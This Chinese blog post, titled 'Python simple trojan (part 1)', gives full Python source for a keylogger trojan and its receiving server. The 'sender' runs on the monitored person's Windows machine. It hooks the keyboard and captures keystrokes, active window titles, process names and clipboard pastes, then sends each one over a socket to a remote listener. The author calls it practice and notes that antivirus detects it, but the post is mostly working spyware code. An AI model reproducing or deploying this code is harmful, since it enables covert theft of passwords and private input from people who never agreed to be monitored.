python简易木马(一),,参考链接:Pytho

文章由Byrx.net分享于2020-12-17 05:12:51评论(213)

python简易木马(一),,参考链接:Pytho


参考链接:

Python编写简易木马程序

参考这个博客来写的

一些具体的问题:

1.配置pyHook模块、ctypes模块,需要这两个木块才能运行成功。

2.将三个模块结合起来要分清client为发送方server为接收方。

结合起来:发送方(被监控者)

# -*- coding:gb2312 -*-from ctypes import*import pythoncomimport pyHookimport win32clipboardimport socketimport threadingdef send(message):    #目标地址ip/URL及端口    target_host = "***.***.***.***"    target_port = 9999    #创建一个socket对象    client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)    #连接主机    client.connect((target_host,target_port))    #发送数据    client.send("GET/HTTP/1.1\r\n"+message+"\r\n\r\n")    #接受响应    response = client.recv(4096)#--------------------------------------------------user32 = windll.user32kernel32 = windll.kernel32psapi = windll.psapicurrent_window = Nonedef get_current_process():    #获取最上层的窗口句柄    hwnd = user32.GetForegroundWindow()    #获取进程ID    pid = c_ulong(0)    user32.GetWindowThreadProcessId(hwnd,byref(pid))    #将进程ID存入变量    process_id = "%d"%pid.value    #申请内存    executable = create_string_buffer("\x00"*512)    h_process = kernel32.OpenProcess(0x400|0x10,False,pid)    psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)    #读取窗口标题    windows_title = create_string_buffer("\x00"*512)    length = user32.GetWindowTextA(hwnd,byref(windows_title),512)    #发送    message = process_id+"    "+executable.value+"    "+windows_title.value    send(message)    #关闭handows    kernel32.CloseHandle(hwnd)    kernel32.CloseHandle(h_process)#定义击键监听事件函数def KeyStroke(event):    global current_window    #检测目标窗口是否发生转移(换了其他窗口就监听其他窗口)    if event.WindowName != current_window:        #函数调用        get_current_process()    #检查击键是否为常规按键(非组合键)并发送    if event.Ascii >32 and event.Ascii < 127:        message = chr(event.Ascii)        send(message)    else:        #如果发现Ctrl+v事件,酒吧粘贴板内容发送        if event.Key == "V":            win32clipboard.OpenClipboard()            pasted_value = win32clipboard.GetClipboardData()            win32clipboard.CloseClipboard()            message = pasted_value            send(message)        else:            send(event.Key)    #监听下一个击键事件    return True#创建并注册hook管理器kl = pyHook.HookManager()kl.KeyDown = KeyStroke#注册hook并执行kl.HookKeyboard()pythoncom.PumpMessages()

接收方:

# -*- coding:gb2312 -*-import socketimport threading#监听的ip及端口bind_ip = "127.0.0.1"bind_port = 9999server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)server.bind((bind_ip,bind_port))server.listen(5)print"[*]Listening on %s:%d"%(bind_ip,bind_port)def handle_client(client_socket):    request = client_socket.recv(1024)    print"[*]Received:%s"%request    client_socket.send("ok!")    client_socket.close()while True:    client,addr = server.accept()    print"[*]Accept connection from:%s:%d"%(addr[0],addr[1])    client_handler = threading.Thread(target=handle_client,args=(client,))    client_handler.start()

就是把三个模块结合,把发送的数据改为记录即可。

未解决问题:

1.哎,没什么用,虽然能实现功能,但是一般的杀毒软件都能检测到程序在监控键盘输入,就当练习玩吧。

2.功能不够完善,没有远程控制功能,把他扔出去就只能接受信息了。

3.未完善鼠标监听和截图功能。

python简易木马(一)

相关内容

评论关闭

最新python教程

python~HOT